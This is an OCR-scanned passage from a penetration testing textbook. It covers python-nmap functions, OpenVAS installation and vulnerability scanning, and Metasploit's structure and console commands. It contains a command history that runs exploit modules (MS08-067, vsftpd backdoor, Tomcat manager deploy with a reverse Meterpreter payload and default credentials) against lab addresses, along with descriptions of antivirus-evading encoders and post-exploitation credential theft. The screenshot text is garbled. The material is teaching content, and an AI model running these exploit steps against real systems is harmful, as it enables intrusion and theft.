{'tcp': {'services': '1-1024', 'method': 'syn'}} 
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all_hosts() 


The all_hosts() function returns the list of all IP addresses scanned. 


>>> nmp.all_hosts() 
['192.168.25.129'] 


state() 


The state() function returns the state of the IP/host scanned, such as 
whether it’s up or down. 


>>> nmp['192.168.25.129'].state() 


up 


keys() 

The keys() function returns a list of all open ports found during the scan. 
>>> nmp['192.168.25.129']['tcp'].keys() 

[512, 513, 514, 139, 111, 80, 53, 22, 23, 25, 445, 21] 
has_tcp() 


The has_tcp() function checks whether a particular port was found open 
during the scan on the target IP address. 


>>> nmp['192.168.25.129'].has_tcp(22) 
True 


command_line() 


The command line() function returns the exact NMAP command that ran 
in the background to produce the output. 


>>> nmp.command_line() 
‘nmap -oX - -p 1-50 -sV 127.0.0.1' 
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hostname() 


The hostname() function returns the host name of the IP address that you 
pass as an argument. 


>>> nmp['127.0.0.1' ].hostname() 
‘localhost’ 


all_protocols() 


The all_ protocols function returns the list of protocols supported by the 
target IP address. 


>>> nmp['127.0.0.1'].all_protocols() 
[ ' tcp | ] 

Now that you know the basic functions to invoke NMAP from Python, 
you can write some simple Python code that uses a loop to scan multiple 


IP addresses. Then you can use various text processing functions to clean 
and format the output. 


Summary 


In this chapter, you learned about the concepts of vulnerability assessment 
and penetration testing. You now understand the different phases of the 
penetration testing lifecycle and the importance of NMAP, OpenVAS, and 
Metasploit, which are capable of performing most of the tasks across all 
phases of the penetration testing lifecycle. 

This chapter briefed you on the absolute basics and essentials about 
the NMAP tool and gave insights into how the NMAP capabilities can be 
extended using scripts. The chapter also touch on integrating NMAP with 
Python scripting. 
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Do-It-Yourself (DIY) Exercises 


Install NMAP on Windows and Ubuntu. 


Perform a UDP scan on a target system using the 
NMAP command line. 


Use NMAP to detect the operating system on the target 
system. 


Use an NMAP intense scan on a target system. 


Use various NMAP scripts for enumerating services on 
a target system. 


Write some Python code that scans 1 to 500 ports ona 
target system. 
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OpenVAS 


In the previous chapter, you learned about NMAP and its capabilities. 
In this chapter, you'll learn about how OpenVAS can be used to perform 


vulnerability assessments. Specifically, this chapter covers the following: 


e Introduction to OpenVAS 

e Setting up OpenVAS 

e Importing NMAP results into OpenVAS 
e Vulnerability scanning 


e Reporting 


Note The purpose of OpenVAS is limited to vulnerability scanning, 
unlike NMAP and Metasploit, which are capable of doing many more 
things. From this perspective, all the essential OpenVAS tasks are 
covered in this chapter. This will prepare you for the integration of 
OpenVAS with Metasploit in the next chapter, where the real fun 
starts. 


© Sagar Rahalkar 2019 
S. Rahalkar, Quick Start Guide to Penetration Testing, 
https://doi.org/10.1007/978-1-4842-4270-4 2 
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Introduction to OpenVAS 


In the previous chapter, you learned about NMAP. NMAP is a tool that is 
much more than just a port scanner. For example, you used NMAP for 
vulnerability detection. However, it has certain limitations. NMAP mainly 
detects only limited known CVEs. Hence, you certainly need a better 
solution for performing a vulnerability assessment. Here are a few of the 
popular choices: 


e Nessus 

e Nexpose 

e QualysGuard 
e OpenVAS 


These products are mature and used widely in the industry. For the 
scope of this book, you will be learning about the OpenVAS platform. It is 
free for community use and offers many useful features. 

OpenVAS is an abbreviation for Open Vulnerability Assessment 
System. It is not just a tool but a complete framework consisting of several 
services and tools, offering a comprehensive and powerful vulnerability 
scanning and vulnerability management solution. 

Like an antivirus solution has signatures to detect known malwares, 
OpenVAS has set of network vulnerability tests (NVTs). The NVTs are 
conducted using plug-ins, which are developed using Nessus Attack 
Scripting Language (NASL) code. There are more than 50,000 NVTs in 
OpenVAS, and new NVTs are being added on a regular basis. 
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Installation 


OpenVAS comes with multiple installation options, including the Docker 
container. It can be installed on various operating systems. However, the 
easiest and fastest way of getting started with OpenVAS is to download the 
OpenVAS virtual appliance. The OpenVAS virtual appliance ISO image can 
be downloaded from https: //www.greenbone.net/en/install_use_gce/. 

The benefit of using this virtual appliance is it already has all the 
dependencies in place and everything set up. All you need to do is 
download the ISO image, boot it in VMware/VirtualBox, and set up some 
basic things, and OpenVAS will be up and running in no time. 

Once you boot the downloaded ISO, you can get started by selecting 
the Setup option, as shown in Figure 2-1. 


Greenbone Security Manager Setup - Build #435 


= - 
Start setting up your GSM 


oneroff 


Figure 2-1. OpenVAS VM initial install screen 


The setup then initiates, as shown in Figure 2-2. 
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Greenbone Security Manager Setup - Build #435 


Installation in progress... 
Your GSM Community Edition is now being prepared. 


Please visit www.greenbone.net to learn more about commercial 
GSM appliances that solve all levels of enterprise needs. For 
example secure airgap-updates for disconnected networks or 
connectivity with other security systems. 


Figure 2-2. OpenVAS installation and setup 


Now you need to create a new user that you will be using for 
administrative purposes, as shown in Figure 2-3. 


Admin user 
Please choose the username 


for the administrative 
user 


[admin 


GS) <Cancel> 


Figure 2-3. Setting up a user for the Open VAS administrator 


Then you set a password for the newly created user, as shown in 


Figure 2-4. 
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Admin password 
Please enter the password for 
the administrative user. If you 
leave it empty, a random one 
will be generated for you. 


[ovenvasei23_ 


<Cancel> 


oO Kaa 


Figure 2-4. Setting up a password for the OpenVAS administrative 
user 


Once you have set up the administrative credentials, the installation 
reboots, and you are presented with the boot menu, as shown in Figure 


*Greenbone OS 


Figure 2-5. OpenVAS boot menu 
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Next, you will see the command-line console, as shown in Figure 2-6, 
where you need to enter the previously set credentials. 


Welcome to Greenbone OS 4.2 (tty1) 
The web interface is available at: 
http:77192 .168 .25.136 


gsm login: _ 


Figure 2-6. OpenVAS virtual machine command-line console 


You can see that the OpenVAS setup is complete, and its web interface 
has been made available at http://192.168.25.136. You can try accessing 
the web interface, as shown in Figure 2-7. 


Figure 2-7. OpenVAS web interface with login fields 
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Meanwhile, you need to boot into the OS and make a few additional 


setting changes, as shown in Figure 2-8. 


Greenbone OS Administration 


Setup Wizard 
Your GSM is not fully functional yet. Do you 
want to complete the setup now? 


By pressing ’Cancel’, this question will not 
be asked again. 


< No > <Cancel> 


Figure 2-8. OpenVAS setup and user configuration 


You need to create a new admin user and set the username and 


password, as shown in Figure 2-9. 
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Greenbone OS Administration 


Create a new Admin 


Account nane 
Account password 
Account password confirmation (giles 


< OK > <Cance I> 


Figure 2-9. OpenVAS virtual machine user configuration 


The OpenVAS version you are using is the community edition, and it 
doesn’t require any key. However, if you wanted to use the commercial 
version, then you would need to enter the subscription key. For now, you 
can skip this step, as shown in Figure 


Greenbone OS Administration 


There is no Subscription Key for the Greenbone Security Feed installed. 


Either you can skip this step and continue with the Community Feed. This feed is not as 
current and not as complete as the Greenbone Security Feed. But all is there for an immediate 
start. 


Or you can activate a Subscription Key for the Greenbone Security Feed. If you are a customer, 
you should have one at hand. If not, please contact our Support. ñs a commercial user you can 
request an evaluation subscription key (valid for 14 days) via wew.greenbone.net or by sending 
an email to sales@greenbone.net. Please understand that we can only consider requests with 
full commercial contact details. 


Open an Editor to Paste the Key 
Upload the 


key via HITE 


Figure 2-10. OpenVAS subscription key upload screen 
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OpenVAS Administration 


In the previous section, you saw how to set up OpenVAS by downloading 
the ready-to-use virtual machine setup. Now, before you get into the actual 
scanning part, you need to set up a few things as part of administration. 


Feed Update 


Feeds are an absolutely essential component of OpenVAS. If your 
OpenVAS setup has old feeds, then you may miss out on detecting the 
latest vulnerabilities. Hence, it’s crucial to have the latest feeds in place 
before you initiate any scan. To check the current feed version, go to Extras 
» Feed Status, as shown in Figure 2-11. You can see that the feeds have not 
been updated for 54 days. 


Figure 2-11. OpenVAS feed status, with outdated feeds 


To update the feeds, you can go to the terminal and type command 
openvas-feed-update, as shown in Figure 2-12. Just make sure you have 
an active Internet connection to update the feeds. 
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root@kali: ~ e 0o90 
File Edit View Search Terminal Help 
openvasmd-sqlite openvas-stop 
openvas-migrate-to-postgres 
root@kali:-# openvas-feed-update 
[>] Updating OpenVAS feeds 
[*] [1/3] Updating: NVT 
OpenVAS community feed server - http://www.openvas.org/ 
This service is hosted by Greenbone Networks - http://www.greenbone.net/ 
ALL transactions are logged. 


If you have any questions, please use the OpenVAS mailing lists 
or the OpenVAS IRC chat. See http://www.openvas.org/ for details. 


By using this service you agree to our terms and conditions. 
Only one sync per time, otherwise the source ip will be blocked. 
receiving incremental file list 
plugin feed info.inc 
1,131 100% 1.08MB/s 0:00:00 (xfr#1, to-chk=0/1) 
sent 43 bytes received 1,234 bytes 364.86 bytes/sec 
total size is 1,131 speedup is 0.89 
OpenVAS community feed server - http://www.openvas.org/ 
This service is hosted by Greenbone Networks - http://www.greenbone.net/ 


All transactions are logged. 


If you have any questions, please use the OpenVAS mailing lists 
or the OpenVAS IRC chat. See http://www.openvas.org/ for details. 


By using this service you agree to our terms and conditions. 
Only one sync per time, otherwise the source ip will be blocked. 


receiving incremental file list 


Figure 2-12. Updating the OpenVAS vulnerability feeds 
The feed update will take some time; once it’s done, you can again go 


to the OpenVAS web interface and check the feed status. Now you should 
see that the feed status is current, as shown in Figure 2-13. 
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vn FE cree "S own otetions 


Figure 2-13. OpenVAS feed status, updated 


User Management 


OpenVAS works in a client-server architecture, where multiple users 
can connect to a centralized server. Hence, it is important to create and 
manage users and groups. Before you create users, you need to have 
some user groups in place. To create new OpenVAS user groups, go to 
Administration > Groups, as shown in Figure 2-14. 


Greenie Seva ty Aishiant - Merita Aretan ceo 


esar meor 
[Roe Veter plhorencive Securty Y ai bna Y at Doce Yai Taod © Epit oE Arang Eja Forns \Nethiantor G Gatang States 


rase eoue oC 


bo Roles itd of 7) ——— 
C 


2 gou 
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8 oaoa 
8 ouau 
2 oaza 
8 a20 
Seana 

ou 


Adwinatrater fut piega. 


Orsara 
isre 
vrer 


Figure 2-14. OpenVAS user management console 


Once you have created and configured the required groups, you 
can create new users and assign them to specific groups based on their 
privilege levels. To create a new user, go to Administration > Users, as 


shown in Figure 2-15. 
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Gommare Secntry Amati - Macia Prete coo 
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Figure 2-15. Adding new users into Open VAS 


While OpenVAS allows you to create and manage users locally, it also 
allows you to connect with Lightweight Directory Access Protocol (LDAP) 
for centralized user management. It is possible to configure the LDAP 
settings by going to Administration > LDAP, as shown in Figure 2-16. 


Greenbone Security Assistant - Mozilla Firefox 
J @ Greentone Securty A wt 


(E De. menman ae semra Lrame visu Lichen» Laats X27 kate Pha] 220¥SIaAI03 


Bhon Vated~ BlOrtensive Secury Y Kat Linc Y at Docs Y Kad Toots ® Explot-DE WArcrackeg TYKA Forums Y NetHuncer @ Gettng Stated 


cy LDAP per-User Authentication 


Figure 2-16. OpenVAS configuration for LDAP authentication 
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Similarly, OpenVAS can also be configured to authenticate against the 
RADIUS server. It can be done by configuring the RADIUS server settings 
at Administration > RADIUS, as shown in Figure 2-17. 


Greerbose Security Assistant - Mozila Firefox 


nplOR-O8 ByArciech-np Rd Fours “\NetHenner Gemeg Started 


Figure 2-17. OpenVAS configuration for RADIUS authentication 


Dashboard 


OpenVAS has a rich dashboard that is its home page by default. The 
dashboard offers a centralized view of tasks, hosts, NVTs, and so on, as 
shown in Figure 2-18. Each demographic can be exported in CSV format. 
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Figure 2-18. OpenVAS dashboard with demographics 
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Scheduler 


In an enterprise environment, it may happen that scans are required to run 
after business hours. In such a scenario, the OpenVAS scheduler can be 
handy. The scheduler can be accessed at Configuration > Schedules and 
can be used to trigger scans at a specific time, as shown in Figure 2-19. 


Greenbone Security Assistant - Mozilla Firefox 
j @ Greenbone Security A. \ + 


(EOR | nttp-/127.0.0, 929 romp? cman get_schecules&tomen=<f73 3281-4233- 46f-9924-Sd96tdr8368 © HA Search 


S Most Vistedy [Ottensive Security N Kali Linux \ Keli Docs “\ Kali Tools Bxplot-D8 By Aircrack-ng RYKali Forums N NetHunter @ Getting Started 
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Cocedinaied Ureversal Time = 

eB town z 
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Figure 2-19. OpenVAS scan scheduler 


Trashcan 


Ifyou happen to delete any of the entities in OpenVAS and later need to 
get them back, it is possible to recover them through the trashcan. You can 
access it at Extras > Trashcan, as shown in Figure 2-20. 
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Greenbone Security Assistant - Moria Firefox 
$ Greenbone Security A. x \ + 
E DB, mips 


B Mest Vishedv HlOlensve Secusty Y Kal Linux N Kali Docs Kall Tocis ® Explot-D Aircrack-ng RUKA Fonsms Y NetHunter @ Getting Started 


a 
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Contents 


3 
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Figure 2-20. OpenVAS trashcan for viewing and restoring deleted 
items 


Help 


Though most of the tasks in OpenVAS are simple and easy to find, it 
may so happen that you need some help on certain topics. OpenVAS 
has comprehensive help documentation that you can access at Help > 
Contents, as shown in Figure 2-21. 
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Figure 2-21. OpenVAS help content 


Vulnerability Scanning 


Now that you have OpenVAS set up and running with updated feeds, you 
can get started with scanning a live target. Here, you'll first try to scan a 
Linux system. Log into the OpenVAS web interface, as shown in Figure 2-22. 


Creatas tonie ty Acstatare eat Feet eco 


Figure 2-22. OpenVAS login page 
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The next step is to create a new scan task. To create a new scan task, go 
to Scans > Tasks, as shown in Figure 2-23. 
Greenbone Security Assistant - Mozilla Firefox 


@ Greendone SecurtyA. x | + 
€ DA rps /127.0.0.1 


st Visitedy jensive Secunty Unux j s > Exploit- 'orack-ng OTUs lumer tting Start 
fmo: dv plor Secunty Ñ Kati N Kali Docs N Kali Tools = Explot-DB Wy Air Urur N NetHunter @ Getting Started 


opna z Filter 


| Task Wizara 
Advanced Task Wizard 
IN Mosity Task Wierd 


No Tasks with High severity found 


È EE EES 


Figure 2-23. OpenVAS dashboard and task wizard 


Now you can either choose to start a simple task wizard or use an 
advanced task wizard that offers more scan flexibility. For now, you'll get 
started with the simple task wizard, as shown in Figure 2-24. All you need 
to do is enter the target IP address and click Start Scan. 
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J @ Greenbone Security A. x \ + 


(€) OR | ttps:1/127.0.0.1:9392/omp7cmd=get_tasks&token« lafaa850-7¢39-4afe-98al-2dd959a 18303 
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‘Quick start: Immediately scan an IP address 
IP address or hostname: 
l 192.168 25.129 


‘The datout Sagres is Gahe yOu CoMmpPuter OF OUT herwork gateway. 
AS a Short-cut | will do the folowing for your 


4 EWECH the view 1O PIZA every 30 seconds 80 you can loari beck and waich the scan progress 


Infect, st, you must nt lean back. As soon as the scan progess is beyond 206, you can steady hanp to 
scan repont via the link in the Reports Total results collect 


When creating the Target and Task | will use the defauts as configured in “My Settings”. 
By chcking the New Task won EJ you can create a new Task yourself, 


Figure 2-24. Initiating a new vulnerability scan in OpenVAS 


Note that OpenVAS has several predefined scan profiles. Depending 
on the specific requirement, you can choose one of the following scan 
profiles: 


e Discovery 

e Full and Fast 

e Full and Fast Ultimate 

e Full and Very Deep 

e Full and Very Deep Ultimate 
e Host Discovery 

e System Discovery 


For the default scan, the Full and Fast profile is selected. 
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The scan gets initiated, and you can see the scan status is set to 
Running, as shown in Figure 2-25. The scan’s action tab provides various 
ways to pause and resume the scan if required. 
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Figure 2-25. OpenVAS task status dashboard 


Once the scan is complete, you can go to Scans > Results to view the 
vulnerabilities identified during the scan, as shown in Figure 2-26. Now that 
the scan is complete, you can simply view the scan results in the OpenVAS web 
console or download a comprehensive report in the format of your choice. 
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Figure 2-26. Open VAS scan results 
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It is also possible to filter out vulnerability results. For example, you may 
want to see only HTTP-related vulnerabilities. Simply go to Scans > Results, 
and on the Filter tab, enter the filter criteria, as shown in Figure 2-27. 


Coventane Cecutry Amste Meet Prete eco 
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Figure 2-27. OpenVAS scan results and filters 


OpenVAS Additional Settings 


So far you have seen how to set up the OpenVAS virtual machine and get 
started with vulnerability scanning. OpenVAS is a flexible vulnerability 
management system that offers a lot of customization. This section talks 
about some additional OpenVAS settings that you may choose to configure 
as per your requirements. 


Performance 


OpenVAS is certainly a resource-intensive tool. It can consume a lot 

of memory and CPU. Hence, while scanning a number of systems, it is 
worthwhile to keep an eye on its performance. To view the performance 
data, go to Extras > Performance, as shown in Figure 2-28. You can view 
performance data for a custom time period by filtering the dates. 
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Figure 2-28. OpenVAS resource and performance management 
summary 


CVSS Calculator 


The Common Vulnerability Scoring System (CVSS) is the baseline used 
by many security products for calculating a vulnerability’s severity. CVSS 
takes into consideration multiple parameters before computing the 
vulnerability score. OpenVAS offers a ready-to-use CVSS calculator that 
you can use to calculate vulnerability scores. You can access the CVSS 
calculator at Extras > CVSS Calculator, as shown in Figure 2-29. You can 
find more details about CVSS at https: //www. first.org/cvss/. 
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Figure 2-29. Open VAS CVSS calculator 
Settings 


OpenVAS is a highly configurable system and has many settings. It can be 
really useful to get an overview of all the settings and their values in one 
place. You can go to Extras > My Settings, as shown in Figure 2-30, to get 
an overview of the settings configured so far. 
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Figure 2-30. OpenVAS administrative settings 
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Reporting 


So far you have learned how you can effectively use OpenVAS to scan 
target systems. Once the scan is complete, the next important step is to 
generate a detailed report. Having a comprehensive report is extremely 
critical because it will help administrators fix the identified vulnerabilities. 
OpenVAS supports multiple report formats, listed here: 


e Anonymous XML 


e ARF 
e CPE 
e CSV Hosts 


e CSV Results 


e HTML 
e ITG 

e LaTeX 
e NBE 

e PDF 


e Topology SVG 
e TXT 

e Verinice ISM 
e Verinice ITG 

e XML 


To generate a report in the required format, go to Scans > Reports, 
select the format from the drop-down menu, and click the adjacent down 
arrow to download the report, as shown in Figure 2-31. 
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Figure 2-31. Export scan results 


The report contains detailed vulnerability information, as shown in 
Figure 2-32. 
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Figure 2-32. OpenVAS HTML scan report 
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For each vulnerability identified, the report has the following details: 


Summary 

Vulnerability detection result 
Impact 

Solution 

Affected software/OS 
Vulnerability insight 
Vulnerability detection method 
Product detection result 


References 


Summary 


This chapter gave you an essential overview of OpenVAS starting from its 


setup to using it to perform a vulnerability assessment. The next chapter 


will introduce you to the versatile Metasploit framework and help you 
understand how NMAP and OpenVAS can be integrated with Metasploit. 


Do-It-Yourself (DIY) Exercises 


Set up OpenVAS in VirtualBox or VMware. 


Use OpenVAS to scan one Windows host and one Unix- 
based host. 


Generate vulnerability reports in HTML and PDF. 
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Metasploit 


The previous two chapters covered NMAP and OpenVAS, which you can 
use to perform information gathering, enumeration, and vulnerability 
assessments. Moving ahead, this chapter covers the basics of Metasploit, 
which will help you sail through the remaining phases of the penetration 
testing lifecycle. Specifically, this chapter covers the following: 


e Introduction to Metasploit 

e Overview of the Metasploit structure 

e Basic commands and configuration 

e Invoking NMAP and OpenVAS scans from Metasploit 
e Scanning services with Metasploit 


e Meterpreter basics 


Introduction to Metasploit 


Metasploit was released in 2003, when H.D Moore developed a portable 
network tool in Perl. In 2007 it was revised use Ruby. The Metasploit 
project gained commercial acceptance and popularity when Rapid 7 
acquired it in 2009. 

Metasploit is not just a single tool. It is a complete framework. It is 
extremely robust and flexible and has tons of tools to perform various 
simple and complex tasks. It has a unique ability to perform almost all the 
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tasks involved in the penetration testing lifecycle. By using Metasploit, you 
don’t need to reinvent the wheel; you just focus on the penetration testing 
objectives, and all the supporting actions can be performed using various 
components of the framework. 

While Metasploit is powerful and capable, you need to clearly 
understand its structure and components to use it efficiently. 

Metasploit has three editions available. 


e Metasploit Pro 
e Metasploit Community 
e Metasploit Framework 


For the scope of this book, we’ll be using the Metasploit Framework 
edition. 


Anatomy and Structure of Metasploit 


Before jumping into the actual framework commands, you first need to 
understand the structure of Metasploit. The best and easiest way to get 
to know the overall Metasploit structure is to simply browse through its 
directory. In Kali Linux, Metasploit is by default located at /usr/share/ 
metasploit-framework, as shown in Figure 3-1. 
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root@kali: /usr/share/metasploit-framework o0 


File Edit View Search Terminal Help 
root@kali:~# cd /usr/share/metasploit-framework/ 
root@kali:/usr/share/metasploit-framework# ls 


app Gemfile.lock msfdb Rakefile tools 
config lib msfrpc ruby vendor 
data metasploit-framework.gemspec msfrpcd script-exploit 

db modules msfupdate script-password 
documentation msfconsole msfvenom script-recon 

Gemfile msfd plugins scripts 


root@kali: /usr/share/metasploit-framework# fj 


Figure 3-1. The Metasploit directory structure 


You can see that Metasploit has a well-defined structure classifying its 
various components into different categories. 
Ata high level, Metasploit can be visualized as shown in Figure 3-2. 


m ae 


Metasploit Framework 


Figure 3-2. Various components of Metasploit 
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Auxiliaries 


Auxiliaries are the modules that make Metasploit so flexible. A Metasploit 
auxiliary is nothing but a piece of code specifically written to perform a 
task. For example, you may want to check whether a particular FTP server 
is allowing anonymous access or if your web server is vulnerable to a 
heartbleed attack. For all these tasks, there exists an auxiliary module. 

In fact, Metasploit has more than 1,000 auxiliary modules classified 
into 19 categories. The following are the auxiliary categories available in 


Metasploit: 
Admin Analyze Bnat 
Client Crawler Docx 
Dos Fileformat Fuzzers 
Gather Parser Pdf 
Scanner Server Sniffer 
Spoof Sali Voip 
Vsploit 


Payloads 


You have already learned that an exploit is the piece of code that will 

be used against the vulnerable component. The exploit code may run 
successfully, but what you want to happen once the exploit is successful is 
defined by the payload. In simple terms, a payload is the action that needs 
to be performed after the execution of an exploit. For example, if you want 
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to create a reverse shell back to your system, then you need to select the 
appropriate Metasploit payload for that. Metasploit has about 42 payloads 
in the following categories: 


Singles Stagers Stages 


Exploits 


Exploits are an extremely important part of Metasploit. The whole purpose 

of the framework is to offer exploits for various vulnerabilities. An exploit is 

the actual code that will execute on the target system to take advantage of 

the vulnerability. Metasploit has more than 1,800 exploits in 17 categories. 
The following are the various categories of exploits available in 


Metasploit: 
Aix Android Apple_ios 
Bsdi Dialup Firefox 
Freebsd Hpux Irix 
Linux Mainframe Multi 
Netware Osx Solaris 
Unix Windows 

Encoders 


Metasploit helps you generate a wide variety of payloads that you can send 
to the target in multiple ways. In the process, itis quite possible that your 
payload gets detected by antivirus software or any of the security software 
present on the target system. This is where encoders can be of help. 
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Encoders use various techniques and algorithms to obfuscate the payload 
in a way that it doesn’t get detected by antivirus software. Metasploit has 
about 40 encoders in ten categories, as shown here: 


Cmd Generic 
Mipsbe _ Mipsle 
Php Ppc 
Ruby Sparc 
X64 X86 


Post-Exploitation Activities (Post) 


Once you have gained basic access to your target system using any of 
the available exploits, you can use the post modules to further infiltrate 
the target system. These modules help you in all the post-exploitation 
activities including the following: 


e Escalating user privileges to root or administrator 
e Retrieving the system credentials 

e Stealing cookies and saved credentials 

e Capturing keystrokes on the target system 


e Executing custom PowerShell scripts for performing 
additional tasks 


e Making the access persistent 
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Metasploit has about 311 post-exploitation modules in the following 
11 categories: 


Aix Android 
Cisco Firefox 


Hardware Juniper 


Linux Multi 
Osx Solaris 
Windows 


Basic Commands and Configuration 


Now that you are aware of the basic structure and anatomy of Metasploit, 
you can get started with its interface. To access Metasploit, open the 
terminal and type command msfconsole, as shown in Figure 3-3. 
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root@kali: ~ 00o 
File Edit View Search Terminal Help 
root@kali:~# msfconsole 
z2=¢ ( (of (0) | aeeenennaane |======["** 
)=\ | \ 
JINN po \ 
44 \\ |==I seesseases==\ 
// \\ | a LSS 
{1 \\ \(@) (@) (@) (@) (@) (@) (@)/ 
Wf \\ Errrr i ttt 
VEVAVANS 
) ( 
[Arrranananannary / HE \ 
| | t / Cll \ 
| =I | lI) | 
1(@)(@)"""**| (@) (@)**| (@) 2 Il 3 
=[ metasploit v4.17.7-dev ] 
+ -- --=[ 1801 exploits - 1027 auxiliary - 311 post ] 
+ -- --=[ 538 payloads - 41 encoders - 10 nops ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


Figure 3-3. The initial screen of MSFconsole 


help 


Once you have opened MSFconsole, you can get information about all the 
basic commands using the help command, as shown in Figure 3-4. 
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root@kali: ~ 
File Edit View Search Terminal Help 


mst > help 


Core Commands 


Command Description 

? Help menu 

banner Display an awesome metasploit banner 

cd Change the current working directory 

color Toggle color 

connect Communicate with a host 

exit Exit the console 

get Gets the value of a context-specific variable 

getg Gets the value of a global variable 

grep Grep the output of another command 

help Help menu 

history Show command history 

load Load a framework plugin 

quit Exit the console 

route Route traffic through a session 

save Saves the active datastores 

sessions Dump session listings and display information about sessions 
set Sets a context-specific variable to a value 

setg Sets a global variable to a value 

sleep Do nothing for the specified number of seconds 
spool Write console output into a file as well the screen 
threads View and manipulate background threads 

unload Unload a framework plugin 

unset Unsets one or more context-specific variables 
unsetg Unsets one or more global variables 

version Show the framework and console library version numbers 


Module Command 


Command Description 

advanced Displays advanced options for one or more modules 

back Move back from the current context 

info Displays information about one or more modules 

loadpath Searches for and loads modules from a path 

options Displays global options or for one or more modules 

popm Pops the latest module off the stack and makes it active 
previous Sets the previously loaded module as the current module 
pushm Pushes the active or list of modules onto the module stack 
reload all Reloads all modules from all defined module paths 

search Searches module names and descriptions 

show Displays modules of a given type, or all modules 

use Selects a module by name 


Figure 3-4. The output of the help command in MSFconsole 


version 


Vulnerabilities get discovered quickly, and the corresponding exploit code 
is also often released soon after. Therefore, it is important that Metasploit is 
up-to-date and has the latest set of exploit code. To ensure the framework 
version is the latest, you can use the version command, as shown in 
Figure 3-5. You can then compare this version with the one available on 
the Metasploit Git repository. 


81 


CHAPTER 3 METASPLOIT 


root@kali: ~ 0o09 
File Edit View Search Terminal Help 


msf > version 
Framework: 4.17.7-dev 
Console : 4.17.7-dev 
msf > 


Figure 3-5. The output of the version command in MSFconsole 


connect 


We are all aware of utilities such as Telnet, SSH, and Netcat that help us in 
remote administration. Metasploit has a built-in utility called connect that 
can be used to establish a connection and interact with a remote system. It 
supports SSL, proxies, pivoting, and file transfers. The connect command 
needs a valid IP address and port to connect, as shown in Figure 3-6. 


root@kali: ~ 0 © x) 
File Edit View Search Terminal Help 
msf > connect 192.168.25.129 21 = 


[*] Connected to 192.168.25.129:21 
220 (vsFTPd 2.3.4) 


Figure 3-6. The output of the connect command in MSFconsole 
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history 


MSFconsole is entirely operated on the command line, and for each task to 
be performed, you need to type in some command. To see the commands 
you have used so far in MSFconsole, you can use the history command, 
as shown in Figure 3-7. 


root@kali: ~ 
File Edit View Search Terminal Help 


msf > history 

49 exploit 

50 use exploit/windows/smb/ms08 667 netapi 
51 set RHOST 10.216.245.55 

52 exploit 

53 sessions -i 

54 exit 

55 exit 

56 use exploit/windows/smb/ms08_067_netapi 
57 show options 

58 set RHOST 192.168.25.130 

59 exploit 

60 exit 

61 use exploit/windows/smb/ms08 067 netapi 
62 set RHOST 192.168.25.130 

63 exploit 

64 search vsftp 

65 use exploit/unix/ftp/vsftpd_234_backdoo 
66 show options 

67 set RHOST 192.168.25.129 

68 exploit 

69 back 

70 search tomcat 

71 search tomcat_mgr 

72 use exploit/multi/http/tomcat_mgr deploy 
73 set PAYLOAD java/meterpreter/reverse tcp 
74 show options 

75 set RHOST 192.168.25.129 

76 set LHOST 192.168.25.128 

77 set HTTPUSERNAME tomcat 

78 set HTTPPASSWORD tomcat 

79 set target 0 

80 set RPORT 8180 

81 use exploit/windows/smb/ms08 667 netapi 
82 set RHOST 192.168,25.130 

83 exploit 

84 back 

85 use exploit/windows/smb/ms08 667 netapi 
86 set RHOST 192.168.25.136 

87 exploit 

88 exit 

89 use exploit/windows/smb/ms08 667 netapi 
90 set RHOST 192.168.25.130 


91 exploit 
92 use auxiliary/analyze/jtr_crack fast 
93 run 


94 db connect 

95 db status 

96 db connect 

97 db connect 

98 exit 

99 exit 

100 db_connect 

101 db rebuild_cache 
102 db status 


Figure 3-7. The output of the history command in MSFconsole 
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set and setg 


Metasploit has some variables that need to be set before you execute any 
module or exploit. These variables are of two types. 


e Local: Local variables are limited and valid only for a 
single instance. 


e Global: Global variables, once defined, are applicable 
across the framework and can be reused wherever 
required. 


The set command is used to define values of local variables, while the 
setg command is used to define values of global variables, as shown in 
Figure 3-8. 


root@kali: ~ oe 8 
File Edit View Search Terminal Help 
msf > set 
Global 


No entries in data store. 


> set RHOST 192.168.25.129 
T => 192.168.25.129 

> setg RHOST 192.168.25.129 
T => 192.168.25.129 

> 


Figure 3-8. The output of the set and setg commands in 
MSFconsole 
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get and getg 


In the previous section, you saw how to set values of local and global 
variables. Once these values are set, you can see those values using the get 
and getg commands, as shown in Figure 3-9. The get command fetches 
the values of local variables, while the getg command fetches the values of 


global variables. 
root@kali: ~ 0o09 
File Edit View Search Terminal Help 
msf > get A 


Usage: get varl [var2 ...] 
The get command is used to get the value of one or more variables. 


msf > getg 
Usage: getg varl [var2 ...] 


Exactly like get -g, get global variables 
get RHOST 
=> 192.168.25.129 


> 

T 

> getg RHOST 

T => 192.168.25.129 
> 


Figure 3-9. The output of the get and getg commands in 
MSFconsole 


unset and unsetg 


The unset command is used to remove values assigned to a local variable, 
while the unsetg command is used to remove values assigned to a global 
variable, as shown in Figure 3-10. 
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File Edit View Search Terminal 
msf > unset RHOST 

Unsetting RHOST... 

msf > unsetg RHOST 
Unsetting RHOST... 

msf > get RHOST 

RHOST => 

msf > getg RHOST 

RHOST => 

msf > f 


root@kali: ~ 


Help 


Figure 3-10. The output of the unset and unsetg commands in 


MSFconsole 


save 


While working on a penetration testing project, it might happen that you 
configure lots of global variables and settings. You certainly don’t want to 
lose these settings; the save command writes the current configuration to 


a file, as shown in Figure 3-11. 


File Edit View Search Terminal 
msf > save 


Saved configuration to: /root/.msf4/config 


mst >f 


root@kali: ~ 
Help 


Figure 3-11. The output of the save command in MSFconsole 
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info 


There are tons of modules and plug-ins available in Metasploit. It is 
impossible to know all of them. Whenever you want to use any module, 
you can find out more details about it using the info command, as shown 
in Figure 3-12. Simply supply the module name as a parameter to the info 
command to get its details. 


root@kali: ~ o0 
File Edit View Search Terminal Help 


msf > info -h 
Usage: info <module name> [mod2 mod3 ...] 


Options: 

* The flag ‘-j' will print the data in json format 

* The flag ‘-d' will show the markdown version with a browser. More info, but could be slow. 
Queries the supplied module or modules for information. If no module is given, 

show info for the currently active module. 


msf > info payload/windows/meterpreter/reverse tcp 


Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager 
Module: payload/windows/meterpreter/reverse tcp 
Platform: Windows 
Arch: x86 
Needs Admin: No 
Total size: 283 
Rank: Normal 


Provided by: 
skape <mmiller@hick.org> 
sf <stephen fewer@harmonysecurity.com> 
0J Reeves 
hdm <x@hdm. io> 


Basic options: 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: ‘', seh, thread, process, none) 
LHOST yes The listen address (an interface may be specified) 

